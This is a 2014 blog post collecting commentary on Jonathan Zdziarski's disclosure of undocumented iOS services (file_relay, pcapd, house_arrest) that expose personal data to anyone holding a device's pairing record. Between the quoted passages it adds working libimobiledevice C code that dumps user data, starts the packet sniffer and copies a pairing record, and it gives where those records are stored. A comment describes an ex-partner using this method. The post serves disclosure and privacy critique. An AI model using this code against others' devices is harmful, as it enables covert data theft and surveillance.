Saturday, July 19, 2014

iOS Backdoors, Attack Points, and Surveillance Mechanisms

Jonathan Zdziarski (PDF):

Overall, the otherwise great security of iOS has been compromised…by Apple…by design.

Via Michael Yacavone.

Update (2014-07-22): Jonathan Zdziarski:

I have NOT accused Apple of working with NSA, however I suspect (based on released documents) that some of these services MAY have been used by NSA to collect data on potential targets. I am not suggesting some grand conspiracy; there are, however, some services running in iOS that shouldn’t be there, that were intentionally added by Apple as part of the firmware, and that bypass backup encryption while copying more of your personal data than ever should come off the phone for the average consumer. I think at the very least, this warrants an explanation and disclosure to the some 600 million customers out there running iOS devices. At the same time, this is NOT a zero day and NOT some widespread security emergency. My paranoia level is tweaked, but not going crazy. My hope is that Apple will correct the problem. Nothing less, nothing more. I want these services off my phone. They don’t belong there.

Dan Goodin:

Zdziarski said the service that raises the most concern is known as com.apple.mobile.file_relay. It dishes out a staggering amount of data—including account data for e-mail, Twitter, iCloud, and other services, a full copy of the address book including deleted entries, the user cache folder, logs of geographic positions, and a complete dump of the user photo album—all without requiring a backup password to be entered.

He said two other services dubbed com.apple.pcapd and com.apple.mobile.house_arrest may have legitimate uses for app developers or support people but can also be used to spy on users by government agencies or even jilted ex-lovers. The Pcapd service, for instance, allows people to wirelessly monitor all network traffic traveling into and out of the device, even when it’s not running in a special developer or support mode. House_arrest, meanwhile, allows the copying of sensitive files and documents from Twitter, Facebook, and many other applications.
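To make the mechanics concrete, here’s a minimal sketch of pulling a file_relay dump with the open-source libimobiledevice library. It’s modeled on that project’s filerelaytest tool; the source names and the stripped-down error handling are illustrative, and nothing here comes from Apple documentation:

```c
/* Sketch: requesting a file_relay dump via libimobiledevice.
 * Modeled on the library's filerelaytest tool; error handling trimmed. */
#include <stdio.h>
#include <stdint.h>
#include <libimobiledevice/libimobiledevice.h>
#include <libimobiledevice/lockdown.h>
#include <libimobiledevice/file_relay.h>

int main(void)
{
    idevice_t dev = NULL;
    lockdownd_client_t ld = NULL;
    lockdownd_service_descriptor_t svc = NULL;
    file_relay_client_t fr = NULL;
    idevice_connection_t conn = NULL;

    if (idevice_new(&dev, NULL) != IDEVICE_E_SUCCESS)  /* first device found */
        return 1;

    /* The handshake needs nothing beyond a valid pairing record. */
    lockdownd_client_new_with_handshake(dev, &ld, "demo");
    lockdownd_start_service(ld, "com.apple.mobile.file_relay", &svc);
    file_relay_client_new(dev, svc, &fr);

    /* No backup password is involved at any point. */
    const char *sources[] = { "UserDatabases", "CrashReporter", NULL };
    file_relay_request_sources(fr, sources, &conn);

    /* The reply is a gzip-compressed CPIO archive streamed back raw. */
    FILE *out = fopen("dump.cpio.gz", "wb");
    char buf[4096];
    uint32_t got = 0;
    while (idevice_connection_receive(conn, buf, sizeof(buf), &got) == IDEVICE_E_SUCCESS
           && got > 0)
        fwrite(buf, 1, got, out);
    fclose(out);

    file_relay_client_free(fr);
    lockdownd_service_descriptor_free(svc);
    lockdownd_client_free(ld);
    idevice_free(dev);
    return 0;
}
```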

[…]

Zdziarski said the services aren’t easy for anyone to abuse, making it unlikely that hackers could exploit them on a wide scale. Still, he said the functions are within easy reach of technically knowledgeable people who have access to a computer, electric charger, or other device that has ever been modified to digitally pair with a targeted iPhone or iPad. During the pairing process, iDevices create a file containing a set of digital keys. Anyone with access to such files can make almost unfettered use of the services, often wirelessly, until the iPhone or iPad undergoes a factory reset.
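The “file containing a set of digital keys” is the lockdown pairing record. On OS X it lives in /var/db/lockdown, named after the device UDID; Windows keeps its copies under the Apple Lockdown folder in ProgramData. Exfiltrating one is nothing more than ordinary file I/O; the filename below is a placeholder:

```c
/* Sketch: copying a pairing record is all the "theft" requires.
 * The UDID in the path is a placeholder for a real device identifier. */
#include <stdio.h>

static int copy_file(const char *src, const char *dst)
{
    FILE *in = fopen(src, "rb"), *out = fopen(dst, "wb");
    if (!in || !out)
        return -1;
    char buf[8192];
    size_t n;
    while ((n = fread(buf, 1, sizeof(buf), in)) > 0)
        fwrite(buf, 1, n, out);
    fclose(in);
    fclose(out);
    return 0;
}

int main(void)
{
    return copy_file("/var/db/lockdown/0123abcd.plist", "stolen-record.plist");
}
```

Until the device is wiped, that one plist is sufficient to reach the services above, often wirelessly.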

Dan Moren:

The company also reiterated its stance that it doesn’t compromise its systems for the purpose of providing those access points to the authorities: “As we have said before, Apple has never worked with any government agency from any country to create a backdoor in any of our products or services.”

While such statements may be intended to assuage fears over the privacy implications of these systems, they’re hard to classify as categorical denials in this case. For one thing, Apple hasn’t yet explained why anybody needs the breadth of information that these tools seem to provide access to, nor why these services, if indeed for diagnostic use, are not presented for users to opt into. In the case of enterprise environments where devices are provided by a company, users are generally made aware of the access that IT departments have to their devices. But when we’re talking about the general public, no such warning is given—nor should it be needed.

[…]

Apple has taken a firm stand on privacy, and it’s disappointing to see the company not fully and transparently explaining why these systems have the range of access that they do, why they circumvent security processes the company itself put into place, and why there’s no way for a user to easily disable them. That’s the kind of attitude that we’ve grown to expect from the company, and we’d like to see them live up to it.

Update (2014-07-23): Jonathan Zdziarski:

In a response from Apple PR to journalists about my HOPE/X talk, it looks like Apple might have inadvertently admitted that, in the classic sense of the word, they do indeed have back doors in iOS, however claim that the purpose is for “diagnostics” and “enterprise”.

[…]

The problem with this is that these services dish out data (and bypass backup encryption) regardless of whether or not “Send Diagnostic Data to Apple” is turned on or off, and whether or not the device is managed by an enterprise policy of any kind. So if these services were intended for such purposes, you’d think they’d only work if the device was managed/supervised or if the user had enabled diagnostic mode. Unfortunately this isn’t the case and there is no way to disable these mechanisms. As a result, every single device has these features enabled and there’s no way to turn them off, nor are users prompted for consent to send this kind of personal data off the device.
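That claim is easy to test. Here’s a sketch with libimobiledevice that simply asks lockdownd to start each of the three services; on the devices Zdziarski describes, none of these requests is refused, regardless of the diagnostics setting or any MDM enrollment:

```c
/* Sketch: probing whether lockdownd gates these services. It doesn't. */
#include <stdio.h>
#include <libimobiledevice/libimobiledevice.h>
#include <libimobiledevice/lockdown.h>

int main(void)
{
    const char *services[] = {
        "com.apple.mobile.file_relay",
        "com.apple.pcapd",
        "com.apple.mobile.house_arrest",
    };
    idevice_t dev = NULL;
    lockdownd_client_t ld = NULL;

    if (idevice_new(&dev, NULL) != IDEVICE_E_SUCCESS)
        return 1;
    if (lockdownd_client_new_with_handshake(dev, &ld, "probe") != LOCKDOWN_E_SUCCESS)
        return 1;

    for (size_t i = 0; i < sizeof(services) / sizeof(services[0]); i++) {
        lockdownd_service_descriptor_t svc = NULL;
        int ok = (lockdownd_start_service(ld, services[i], &svc) == LOCKDOWN_E_SUCCESS);
        printf("%-34s %s\n", services[i], ok ? "started" : "refused");
        if (svc)
            lockdownd_service_descriptor_free(svc);
    }
    lockdownd_client_free(ld);
    idevice_free(dev);
    return 0;
}
```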

[…]

Obviously, Apple realized that pairing in and of itself offered very little security, as they added backup encryption to all backups as a feature – something that also requires pairing to perform. So Apple doesn’t trust pairing as a “security” solution either. And for good reason: it wasn’t designed to be secure. It is not two factor; it is not encrypted with a user passphrase; it is simply “something you have” that gives you complete unfettered access to the phone. And it can be had as easily as copying one file, or created on the fly via USB. It can be used if law enforcement seizes your computer; it can be stolen by someone hacking in; it is by all means insecure. But even with the pairing record, I would have expected the data that comes off my device to be encrypted with the backup password, right? These services completely bypass this.
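Note that the backup-encryption setting itself is readable over the same lockdown channel; the point is that file_relay returns the same plaintext either way. A sketch, assuming the WillEncrypt key in the com.apple.mobile.backup domain (the flag that reflects the iTunes backup-password setting):

```c
/* Sketch: reading the backup-encryption flag. file_relay's output is
 * identical whether this prints "on" or "off". */
#include <stdio.h>
#include <stdint.h>
#include <plist/plist.h>
#include <libimobiledevice/libimobiledevice.h>
#include <libimobiledevice/lockdown.h>

int main(void)
{
    idevice_t dev = NULL;
    lockdownd_client_t ld = NULL;
    plist_t node = NULL;

    if (idevice_new(&dev, NULL) != IDEVICE_E_SUCCESS)
        return 1;
    lockdownd_client_new_with_handshake(dev, &ld, "demo");

    if (lockdownd_get_value(ld, "com.apple.mobile.backup", "WillEncrypt", &node)
            == LOCKDOWN_E_SUCCESS && node) {
        uint8_t on = 0;
        plist_get_bool_val(node, &on);
        printf("backup encryption: %s\n", on ? "on" : "off");
        plist_free(node);
    }
    lockdownd_client_free(ld);
    idevice_free(dev);
    return 0;
}
```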

Apple responds on its site, but doesn’t really address what people are concerned about (via Cabel Sasser).

Update (2014-07-24): Dan Goodin:

The episode is a good example of the way Apple’s trademark secrecy can come back to bite the company. Apple may have legitimate reasons for folding these services into iOS, even when it isn’t running in special diagnostic or support modes. But the company never took the time to disclose these services or to respond to Zdziarski’s private entreaties to executives until the undocumented functions became an international news story. Zdziarski’s larger point seems to be that the services he brought to light represent vectors that ex-lovers, housemates, co-workers and, yes, spy agencies can exploit to bypass cryptographic protections designed to prevent sensitive data from being accessed by unauthorized parties. Until last weekend, that point was only implicit. It has now been made explicit.

Wickwick:

Example: You’re dating someone who uses your laptop when she visits. Unbeknownst to you, she emails herself the keys from your laptop.

You break up. She visits the same Starbucks as you. While you’re reading emails, she uses the wifi to turn on file relay and copies everything off your phone. There’s no alert, there’s no dialog box. Your phone just starts dumping information.

All an adversary needs is temporary access to a single trusted device once and they have the keys to the kingdom forever.

joosters:

What’s really disappointing is that there seems to be an all-or-nothing security model here. If I pair my phone with a computer, then suddenly it has complete access to spy on me, install monitoring tools that can continue to run, etc. Why can’t there be a way where I can transfer music/photos to/from my phone without providing this full device access?

You’d be pretty annoyed if the front door to your house, when you opened it, also opened up your document safe, emptied your wallet onto the floor and invited visitors to leave bugging devices to spy on you later.

Also, the defence of “just don’t agree to pair your phone with an unknown USB device” can actually be tricky. On a flight, I plugged my phone into the USB port on the seatback to charge it. The phone repeatedly kept asking if I wanted to pair it with something (who knows what it was? the entertainment system, maybe?). If I had accidentally hit the wrong button only once (on a prompt that randomly appeared), my phone could have been owned, and there’s no easy way to un-pair.

Update (2014-07-28): Jonathan Zdziarski:

In iOS, pcapd is available on every iOS device out there, and can be activated on any device without the user’s knowledge. You also don’t have to be enrolled in an enterprise policy, and you don’t have to be in developer mode. What makes this service dangerous is that it can be activated wirelessly, and does not ask the user for permission to activate it… so it can be employed for snooping by third parties in a privileged position.
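A rough sketch of what that activation amounts to, using libimobiledevice’s generic service client. The service streams plist-framed packet records; this just counts raw bytes, which is enough to show that capture begins with no prompt on the device. Parsing the framing is out of scope here:

```c
/* Sketch: attaching to the packet sniffer via the generic service API. */
#include <stdio.h>
#include <stdint.h>
#include <libimobiledevice/libimobiledevice.h>
#include <libimobiledevice/lockdown.h>
#include <libimobiledevice/service.h>

int main(void)
{
    idevice_t dev = NULL;
    lockdownd_client_t ld = NULL;
    lockdownd_service_descriptor_t svc = NULL;
    service_client_t pcap = NULL;

    if (idevice_new(&dev, NULL) != IDEVICE_E_SUCCESS)
        return 1;
    lockdownd_client_new_with_handshake(dev, &ld, "demo");
    lockdownd_start_service(ld, "com.apple.mobile.pcapd", &svc);
    service_client_new(dev, svc, &pcap);

    char buf[4096];
    uint32_t got = 0;
    unsigned long total = 0;
    /* Every byte received here is live traffic entering or leaving the phone. */
    while (service_receive(pcap, buf, sizeof(buf), &got) == SERVICE_E_SUCCESS) {
        total += got;
        fprintf(stderr, "\r%lu bytes captured", total);
    }
    service_client_free(pcap);
    lockdownd_service_descriptor_free(svc);
    lockdownd_client_free(ld);
    idevice_free(dev);
    return 0;
}
```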

[…]

Apple is being completely misleading by claiming that file relay is only for copying diagnostic data. If, by diagnostic data, you mean the user’s complete photo album, their SMS, Notes, Address Book, GeoLocation data, screenshots of the last thing they were looking at, and a ton of other personal data – then sure… but this data is far too personal in nature to ever be needed for diagnostics.

[…]

Additionally, there’s the claim that your data is protected with data-protection encryption. The pairing record that is used to access all of this data is sent with an escrow bag, which contains a backup copy of your key bag keys for unlocking data protection encryption. So again, we’re back to the fact that with any valid pairing, you have access to all of this personal data – whether it was Apple’s intention or not.

Now I hear the argument pop up from a few people who don’t understand how all of this works that, “of course you can dump personal info after you’ve paired, it’s supposed to sync your data”. Well, no. The trust dialog (the only pairing security there is) was only an afterthought that got added last year after another researcher showed how easily you could hijack iOS 6 by simply plugging it into a malicious charger. In fact, Apple added backup encryption to iOS specifically because they realized people’s devices were pairing with a bunch of hardware that the user didn’t trust. If pairing were meant to be a means to security, there would be no need for backup encryption at all.

[…]

In addition to downplaying the services themselves, Apple has stated that the user must “explicitly grant consent” for these services to be used. This is not the case. The user has had no idea these services even exist at all on the device until recently. There is no dialog asking the user to allow the packet sniffer to run, or to access your photos/contacts/sms/etc to provide to AppleCare (the dialogs you’re used to seeing third party apps present are not presented when these services are accessed). This consent simply doesn’t exist. The only consent is pushing that “trust” button, which (unbeknownst to the user) gives complete carte blanche access to the mobile device, wirelessly, indefinitely, and bypassing the backup encryption that the user believes is protecting their data from unwanted eyes.
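As for the escrow bag mentioned above, you can inspect a pairing record yourself. A small sketch using libplist that checks for the HostID, HostCertificate, and EscrowBag entries (key names per the known pairing-record format; pass in whichever record you exported):

```c
/* Sketch: what a lockdown pairing record carries, including the
 * EscrowBag holding backup copies of the keybag keys. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <plist/plist.h>

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <pairing-record.plist>\n", argv[0]);
        return 1;
    }
    FILE *f = fopen(argv[1], "rb");
    if (!f)
        return 1;
    fseek(f, 0, SEEK_END);
    long len = ftell(f);
    rewind(f);
    char *buf = malloc(len);
    fread(buf, 1, len, f);
    fclose(f);

    /* Records may be stored as binary or XML plists. */
    plist_t rec = NULL;
    if (len > 8 && memcmp(buf, "bplist00", 8) == 0)
        plist_from_bin(buf, (uint32_t)len, &rec);
    else
        plist_from_xml(buf, (uint32_t)len, &rec);
    free(buf);
    if (!rec)
        return 1;

    const char *keys[] = { "HostID", "HostCertificate", "EscrowBag" };
    for (int i = 0; i < 3; i++)
        printf("%-16s %s\n", keys[i],
               plist_dict_get_item(rec, keys[i]) ? "present" : "missing");
    plist_free(rec);
    return 0;
}
```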

Jonathan Zdziarski:

In spite of my warnings to the media (via email and telephone inquiries) not to pitch this as a conspiracy theory, they have still managed to completely derail the original intention of this research, and so I think a quick proof-of-concept video will help to clear up any misunderstandings about what this technique can and can’t do. I’ve also outlined the threat models that will and won’t work for this attack.

2 Comments

About what I expected...

(On the OS X side, my guess is that nothing beyond Snowy is safe, assuming Little Snitch. And I don't even trust rev2 of the final Snowy update.)

[…] Jonathan Zdziarski on the changes in iOS that address his reported iOS Backdoors, Attack Points, and Surveillance Mechanisms: […]
